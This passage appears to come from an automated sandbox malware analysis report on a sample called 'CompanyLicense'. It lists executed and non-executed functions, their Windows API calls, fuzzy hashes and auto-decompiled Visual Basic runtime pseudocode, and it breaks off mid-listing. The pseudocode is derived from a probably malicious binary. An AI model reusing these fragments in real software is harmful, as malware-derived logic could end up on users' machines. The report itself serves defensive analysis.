                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 37d68a8435de523fb03b8205e42a7b83d43b8fb8e480610d9adcda41fd16ccb2
                                      • Instruction ID: 5ddaee3bc187b9c6d11e5a3781cdba4c454b37ee04ee130224d80e8dcf342578
                                      • Opcode Fuzzy Hash: 37d68a8435de523fb03b8205e42a7b83d43b8fb8e480610d9adcda41fd16ccb2
                                      • Instruction Fuzzy Hash: 1021A405C498CB03C22202B5285A280FF763D93D38B8962D9ADBB1357BDB923D7487D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A6F5A, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 333316bb146871931e86f4c42769b21623430b4709fcc6f6577310cbbb953688
                                      • Instruction ID: da4ab30113320da7ce75c8f2c1de94ba3b7877dec6db966674e58058fdcea018
                                      • Opcode Fuzzy Hash: 333316bb146871931e86f4c42769b21623430b4709fcc6f6577310cbbb953688
                                      • Instruction Fuzzy Hash: B9F0BB60500345FECB657FF89470FBEA6969F90365FD0C516F48595174CA348580AE91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A1C64, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegSetValueExA.KERNELBASE(68F644E8,020A53BB,00000000,00000001,?,?,?,00000062,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A1C74
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 469eee8ebd3e3eeff31f16080f35e31665fccafa1dfd15cb80a68d903528f736
                                      • Instruction ID: d18663404f8cb7d0de5a0d80504995ac762f7ad6cd04d2ea0d96e59707c0013b
                                      • Opcode Fuzzy Hash: 469eee8ebd3e3eeff31f16080f35e31665fccafa1dfd15cb80a68d903528f736
                                      • Instruction Fuzzy Hash: 64C08C7011032ABEFA206A104C2DFF76A29DB20790FA00011FD4780080C2A008A0C120
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A414A, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,020A4127,020A4170,020A0A81,?,6DDC21B5,6DDB9555,?,321C9581), ref: 020A4162
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cda1dba48740bd7b96318cf17742556920cb9191cb371ca8628f9592a64ccb55
                                      • Instruction ID: fb4e8a10fca13062ed22e8844e0c5964df734744d4ab3234c114c16073b3e70e
                                      • Opcode Fuzzy Hash: cda1dba48740bd7b96318cf17742556920cb9191cb371ca8628f9592a64ccb55
                                      • Instruction Fuzzy Hash: 90C09B717D4304B6FE3486209D5BFC562155F50F00F508509BF493C1C557F15551C519
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A63FA, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00000200,020A1DCD,?,?,?,?,020A542F,020A5406,?,020A3459,?,00000000,?,00400000), ref: 020A6409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: 4fae3519ba45faf50e482691a33078ce43044b0682cbaf733adcd1adfce0ec30
                                      • Instruction ID: ebdbc468bdaf990d5e42f97783f01cb94850ad1fa1d2e16b1e7bed6b8efccc79
                                      • Opcode Fuzzy Hash: 4fae3519ba45faf50e482691a33078ce43044b0682cbaf733adcd1adfce0ec30
                                      • Instruction Fuzzy Hash: 9DC04C75204300EBE6909A54CC88F9AB668BB54701F849405BA8586185C63098449B31
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A3BA5, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 74751e9ee2263e4e98cc4fbd937d6dba48a7e67fd6933a660b04b1a42a213244
                                      • Instruction ID: 5207ce8731fd3eb2881ae61304ade273c69a32ca9e51b72e2e433430400e0280
                                      • Opcode Fuzzy Hash: 74751e9ee2263e4e98cc4fbd937d6dba48a7e67fd6933a660b04b1a42a213244
                                      • Instruction Fuzzy Hash: 52B0123420038711CD60176C2C2EBD822500F427F8F6403402C3A740D1DB9080864300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 020A2259, Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: xsR@
                                      • API String ID: 1029625771-657063712
                                      • Opcode ID: 5e99369e2f4dbd95666e1e1ec8833a37c586e66ed69bc929f4ea37001b98ea52
                                      • Instruction ID: d07bf7116b9356981e2ad6d02261f4d3321e233c382c526685b216254a44abd5
                                      • Opcode Fuzzy Hash: 5e99369e2f4dbd95666e1e1ec8833a37c586e66ed69bc929f4ea37001b98ea52
                                      • Instruction Fuzzy Hash: DCB1BC71700702AFE758DF68CCA0BD9B3E5FF09310F998229EC9993641CB34A895DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A2C7B, Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cc99db7a558a3c547d0e9d59a56d790343f8136e82c1bc14edacc85c305e8f6
                                      • Instruction ID: 271974f16cd9004389f4032c52de856492dd2ad088c45bc1c773c3c743379722
                                      • Opcode Fuzzy Hash: 1cc99db7a558a3c547d0e9d59a56d790343f8136e82c1bc14edacc85c305e8f6
                                      • Instruction Fuzzy Hash: 0441B321C48AC64BC32247F45865780FBB67F12A24FC561E9EDAA07577C7626CB08BD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A2C10, Relevance: .1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f81c0b347ddf7d66d1f895e2656c34a4080e9fb090927730c26f1cf3ec6f8a6f
                                      • Instruction ID: 8b93406e78d09c30aa03b9826edf2111fb1ca305dc4297a872637e2ff25c7486
                                      • Opcode Fuzzy Hash: f81c0b347ddf7d66d1f895e2656c34a4080e9fb090927730c26f1cf3ec6f8a6f
                                      • Instruction Fuzzy Hash: 11318170244340EFE7659FA4CC69FD9B7A1BF04710F9181A9F9499B1E2C7B4D880DE62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A7679, Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7a8a6f6faf74c24bd568ac0e525f22e7c79819665f2a0f3a2ba3472c922950c
                                      • Instruction ID: bddf967d2b6c00b8832a65de2feb0068da7d5cd30b075a6ab3d4ed5f01df4099
                                      • Opcode Fuzzy Hash: e7a8a6f6faf74c24bd568ac0e525f22e7c79819665f2a0f3a2ba3472c922950c
                                      • Instruction Fuzzy Hash: 61E0E5712413008FC755DA4CC6F4F5AB3E6ABA9700F92C464E901CB231C730EC80EA24
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A3CAD, Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 410899e20b309485bf3370f9554471b3ec47b55d86e5f855de6a4e427a824a2a
                                      • Instruction ID: e0bd24129803a8887135fd3e7077837f0750ee546a6ee63f9c827fd2888342a4
                                      • Opcode Fuzzy Hash: 410899e20b309485bf3370f9554471b3ec47b55d86e5f855de6a4e427a824a2a
                                      • Instruction Fuzzy Hash: 73B092B6201580DFEF02CB08D881B4073A0FB19688B0804D0E802CF712D224E900CA00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A6F42, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe7b640eb91560de0a1d59365ec93c22a84d79ef6b93bb6c5a2c604496af8698
                                      • Instruction ID: 22e6b54d124a314dba9cdc44a6f2a1304a5903fce6cde379fbb7f3ac5e55aa25
                                      • Opcode Fuzzy Hash: fe7b640eb91560de0a1d59365ec93c22a84d79ef6b93bb6c5a2c604496af8698
                                      • Instruction Fuzzy Hash: 63B002353515448FC655CA19D1A0F8673E6BB55690FE15490E4128BA51C368ED54CA01
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A8E25, Relevance: .0, Instructions: 3COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7bfd68e5c081b8d57b51952ce45696539fb336343074da8183e193ab14173b8
                                      • Instruction ID: 1ec3b35e9653f1b133a7008f9c6b2377d7b5a9bc65c064a7acbf97b12dd99877
                                      • Opcode Fuzzy Hash: e7bfd68e5c081b8d57b51952ce45696539fb336343074da8183e193ab14173b8
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411266, Relevance: 27.1, APIs: 18, Instructions: 117COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E00411266(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				void* _v52;
				char _v56;
				char _v60;
				char _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				void* _v96;
				signed int _v100;
				intOrPtr* _v112;
				signed int _v116;
				char* _t56;
				char* _t57;
				char* _t61;
				signed int _t65;
				char* _t67;
				void* _t91;
				void* _t93;
				intOrPtr _t94;

				_t94 = _t93 - 0xc;
				 *[fs:0x0] = _t94;
				L004012E0();
				_v16 = _t94;
				_v12 = 0x401248;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x4012e6, _t91);
				L00401412();
				L004013EE();
				_v84 = _a4;
				_v92 = 9;
				L00401412();
				_t56 =  &_v76;
				_push(_t56);
				L004013AC();
				_v96 =  ~(0 | _t56 != 0x0000ffff);
				L0040143C();
				_t57 = _v96;
				if(_t57 != 0) {
					if( *0x413010 != 0) {
						_v112 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x402b8c);
						L0040142A();
						_v112 = 0x413010;
					}
					_t61 =  &_v56;
					L00401430();
					_v96 = _t61;
					_t65 =  *((intOrPtr*)( *_v96 + 0x130))(_v96,  &_v60, _t61,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x308))( *_v112));
					asm("fclex");
					_v100 = _t65;
					if(_v100 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x403ac4);
						_push(_v96);
						_push(_v100);
						L0040145A();
						_v116 = _t65;
					}
					_push(0);
					_push(0);
					_push(_v60);
					_push( &_v76);
					L00401424();
					_push(1);
					_t67 =  &_v76;
					_push(_t67);
					L00401418();
					L0040141E();
					_push(_t67);
					L004013A6();
					L0040140C();
					_push( &_v60);
					_t57 =  &_v56;
					_push(_t57);
					_push(2);
					L00401406();
					L0040143C();
				}
				_push(0x41140e);
				L0040143C();
				L0040140C();
				return _t57;
			}


























                                      0x00411269
                                      0x00411278
                                      0x00411282
                                      0x0041128a
                                      0x0041128d
                                      0x00411294
                                      0x004112a3
                                      0x004112ac
                                      0x004112b7
                                      0x004112bf
                                      0x004112c2
                                      0x004112cf
                                      0x004112d4
                                      0x004112d7
                                      0x004112d8
                                      0x004112e8
                                      0x004112ef
                                      0x004112f4
                                      0x004112fa
                                      0x00411307
                                      0x00411321
                                      0x00411309
                                      0x00411309
                                      0x0041130e
                                      0x00411313
                                      0x00411318
                                      0x00411318
                                      0x0041133c
                                      0x00411340
                                      0x00411345
                                      0x00411354
                                      0x0041135a
                                      0x0041135c
                                      0x00411363
                                      0x0041137f
                                      0x00411365
                                      0x00411365
                                      0x0041136a
                                      0x0041136f
                                      0x00411372
                                      0x00411375
                                      0x0041137a
                                      0x0041137a
                                      0x00411383
                                      0x00411385
                                      0x00411387
                                      0x0041138d
                                      0x0041138e
                                      0x00411396
                                      0x00411398
                                      0x0041139b
                                      0x0041139c
                                      0x004113a6
                                      0x004113ab
                                      0x004113ac
                                      0x004113b4
                                      0x004113bc
                                      0x004113bd
                                      0x004113c0
                                      0x004113c1
                                      0x004113c3
                                      0x004113ce
                                      0x004113ce
                                      0x004113d3
                                      0x00411400
                                      0x00411408
                                      0x0041140d

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411282
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 004112AC
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 004112B7
                                      • __vbaVarDup.MSVBVM60 ref: 004112CF
                                      • #562.MSVBVM60(?), ref: 004112D8
                                      • __vbaFreeVar.MSVBVM60(?), ref: 004112EF
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?), ref: 00411313
                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00411340
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130,?,?,?,?,?), ref: 00411375
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?), ref: 0041138E
                                      • __vbaStrVarMove.MSVBVM60(?,00000001,?,?,?,004012E6), ref: 0041139C
                                      • __vbaStrMove.MSVBVM60(?,00000001,?,?,?,004012E6), ref: 004113A6
                                      • #580.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 004113AC
                                      • __vbaFreeStr.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 004113B4
                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,00000001,?,?,?,004012E6), ref: 004113C3
                                      • __vbaFreeVar.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 004113CE
                                      • __vbaFreeVar.MSVBVM60(0041140E,?), ref: 00411400
                                      • __vbaFreeStr.MSVBVM60(0041140E,?), ref: 00411408
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$Move$#562#580CallCheckChkstkCopyHresultLateListNew2
                                      • String ID:
                                      • API String ID: 2788452748-0
                                      • Opcode ID: 3dbf35cb02a4955189acaf7678027ac11abcae840226aa9cc9c93d900ac3fc9b
                                      • Instruction ID: 6f4b6da79870560e2800a84909d0d70356a4cdb8e9f83d64f06db6890049b8a7
                                      • Opcode Fuzzy Hash: 3dbf35cb02a4955189acaf7678027ac11abcae840226aa9cc9c93d900ac3fc9b
                                      • Instruction Fuzzy Hash: 8E41FA75900208ABDB00EFE1C895FDDBBB8AF08704F50412AF515BB1B5DB789946CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004118D3, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E004118D3(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a24, void* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				intOrPtr _v60;
				char _v64;
				void* _v88;
				char _v104;
				char* _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v156;
				short _t40;
				short _t41;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t61 = _t60 - 0xc;
				 *[fs:0x0] = _t61;
				L004012E0();
				_v16 = _t61;
				_v12 = 0x4012a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012e6, _t58);
				L00401412();
				L00401412();
				L00401412();
				L004013EE();
				_v128 =  &_v64;
				_v136 = 0x4008;
				_push(1);
				_push( &_v136);
				_push( &_v104);
				L0040138E();
				_v144 = 0x403c14;
				_v152 = 0x8008;
				_push( &_v104);
				_t40 =  &_v152;
				_push(_t40);
				L00401394();
				_v156 = _t40;
				L0040143C();
				_t41 = _v156;
				if(_t41 != 0) {
					_push(0x98);
					L00401388();
					_v60 = _t41;
				}
				_push(0x4119eb);
				L0040143C();
				L0040143C();
				L0040140C();
				L0040143C();
				return _t41;
			}






















                                      0x004118d6
                                      0x004118e5
                                      0x004118f1
                                      0x004118f9
                                      0x004118fc
                                      0x00411903
                                      0x00411912
                                      0x0041191b
                                      0x00411926
                                      0x00411931
                                      0x0041193e
                                      0x00411946
                                      0x00411949
                                      0x00411953
                                      0x0041195b
                                      0x0041195f
                                      0x00411960
                                      0x00411965
                                      0x0041196f
                                      0x0041197c
                                      0x0041197d
                                      0x00411983
                                      0x00411984
                                      0x00411989
                                      0x00411993
                                      0x00411998
                                      0x004119a1
                                      0x004119a3
                                      0x004119a8
                                      0x004119ad
                                      0x004119ad
                                      0x004119b0
                                      0x004119cd
                                      0x004119d5
                                      0x004119dd
                                      0x004119e5
                                      0x004119ea

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004118F1
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 0041191B
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411926
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411931
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041193E
                                      • #619.MSVBVM60(?,00004008,00000001), ref: 00411960
                                      • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 00411984
                                      • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 00411993
                                      • #568.MSVBVM60(00000098,?,?,?,00004008,00000001), ref: 004119A8
                                      • __vbaFreeVar.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119CD
                                      • __vbaFreeVar.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119D5
                                      • __vbaFreeStr.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119DD
                                      • __vbaFreeVar.MSVBVM60(004119EB,?,?,?,00004008,00000001), ref: 004119E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#568#619ChkstkCopy
                                      • String ID: ABC
                                      • API String ID: 718684173-2743272264
                                      • Opcode ID: baa47468dbc3f9b0507266712fca8a7059b0470f197b01c4a43c2c714149d7c6
                                      • Instruction ID: 289367e65df1a72699b5549ded5959713d7176c195a492a93b176dcb255d4e5a
                                      • Opcode Fuzzy Hash: baa47468dbc3f9b0507266712fca8a7059b0470f197b01c4a43c2c714149d7c6
                                      • Instruction Fuzzy Hash: DF21DB71900248AADB14EFA1C992FDDB7B8BF04704F5080BAB505B71A1EB786A49CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411005, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 94COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 45%
                                      			E00411005(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				char _v60;
				char _v80;
				intOrPtr* _v84;
				signed int _v88;
				char _v96;
				signed int _v100;
				char* _t41;
				intOrPtr _t48;
				char* _t49;
				char* _t52;
				signed int _t55;
				intOrPtr _t65;

				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t65;
				_push(0x50);
				L004012E0();
				_v12 = _t65;
				_v8 = 0x401228;
				_v36 = 0x80020004;
				_v44 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v44);
				_push(0x403bdc);
				_push( &_v60);
				L004013BE();
				_t41 =  &_v60;
				_push(_t41);
				_push(0x2008);
				L004013C4();
				_v80 = _t41;
				_push( &_v80);
				_push( &_v24);
				L004013CA();
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401400();
				_t48 =  *((intOrPtr*)(_v24 + 0xc));
				_push( *((intOrPtr*)(_t48 + (0 -  *((intOrPtr*)(_v24 + 0x14))) * 4)));
				_push(0x403be8);
				L004013B8();
				if(_t48 != 0) {
					if( *0x413744 != 0) {
						_v96 = 0x413744;
					} else {
						_push(0x413744);
						_push(0x403bc8);
						L0040142A();
						_v96 = 0x413744;
					}
					_t21 =  &_v96; // 0x413744
					_v84 =  *((intOrPtr*)( *_t21));
					_t24 =  &_v28; // 0x413744
					_t52 = _t24;
					L00401460();
					_t55 =  *((intOrPtr*)( *_v84 + 0x10))(_v84, _t52, _t52, _a4);
					asm("fclex");
					_v88 = _t55;
					if(_v88 >= 0) {
						_v100 = _v100 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x403bb8);
						_push(_v84);
						_push(_v88);
						L0040145A();
						_v100 = _t55;
					}
					L0040144E();
				}
				_push(0x411149);
				_t36 =  &_v24; // 0x403be8
				_t49 = _t36;
				_push(_t49);
				_push(0);
				L004013B2();
				return _t49;
			}





















                                      0x0041100a
                                      0x00411015
                                      0x00411016
                                      0x0041101d
                                      0x00411020
                                      0x00411028
                                      0x0041102b
                                      0x00411032
                                      0x00411039
                                      0x00411040
                                      0x00411042
                                      0x00411047
                                      0x00411048
                                      0x00411050
                                      0x00411051
                                      0x00411056
                                      0x00411059
                                      0x0041105a
                                      0x0041105f
                                      0x00411064
                                      0x0041106a
                                      0x0041106e
                                      0x0041106f
                                      0x00411077
                                      0x0041107b
                                      0x0041107c
                                      0x0041107e
                                      0x00411091
                                      0x00411094
                                      0x00411097
                                      0x0041109c
                                      0x004110a3
                                      0x004110ac
                                      0x004110c6
                                      0x004110ae
                                      0x004110ae
                                      0x004110b3
                                      0x004110b8
                                      0x004110bd
                                      0x004110bd
                                      0x004110cd
                                      0x004110d2
                                      0x004110d8
                                      0x004110d8
                                      0x004110dc
                                      0x004110ea
                                      0x004110ed
                                      0x004110ef
                                      0x004110f6
                                      0x0041110f
                                      0x004110f8
                                      0x004110f8
                                      0x004110fa
                                      0x004110ff
                                      0x00411102
                                      0x00411105
                                      0x0041110a
                                      0x0041110a
                                      0x00411116
                                      0x00411116
                                      0x0041111b
                                      0x0041113d
                                      0x0041113d
                                      0x00411140
                                      0x00411141
                                      0x00411143
                                      0x00411148

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411020
                                      • #711.MSVBVM60(?,00403BDC,0000000A,000000FF,00000000,?,?,?,?,?,?,?,004012E6), ref: 00411051
                                      • __vbaAryVar.MSVBVM60(00002008,?,?,00403BDC,0000000A,000000FF,00000000,?,?,?,?,?,?,?,004012E6), ref: 0041105F
                                      • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00403BDC,0000000A,000000FF,00000000), ref: 0041106F
                                      • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00403BDC,0000000A,000000FF,00000000), ref: 0041107E
                                      • __vbaStrCmp.MSVBVM60(00403BE8,?), ref: 0041109C
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,00403BE8,?), ref: 004110B8
                                      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004110DC
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000010), ref: 00411105
                                      • __vbaFreeObj.MSVBVM60(00000000,?,00403BB8,00000010), ref: 00411116
                                      • __vbaAryDestruct.MSVBVM60(00000000,;@,00411149,00403BE8,?), ref: 00411143
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#711AddrefCheckChkstkCopyDestructHresultListNew2
                                      • String ID: D7A$D7A;@
                                      • API String ID: 4246334928-2347690085
                                      • Opcode ID: 1e39192127afebf687229e71ae3fd41bb69157881493decb036d74ff224b680d
                                      • Instruction ID: 95d849ccea44ae36ec51817e5fa12a4589028856cd8040deecdf32812a235dcd
                                      • Opcode Fuzzy Hash: 1e39192127afebf687229e71ae3fd41bb69157881493decb036d74ff224b680d
                                      • Instruction Fuzzy Hash: BA310AB1900248AFDB10EFD5C846FDEBBB8EB08705F10416AF601BB1E1D778A644CB29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004114E0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70COMMON
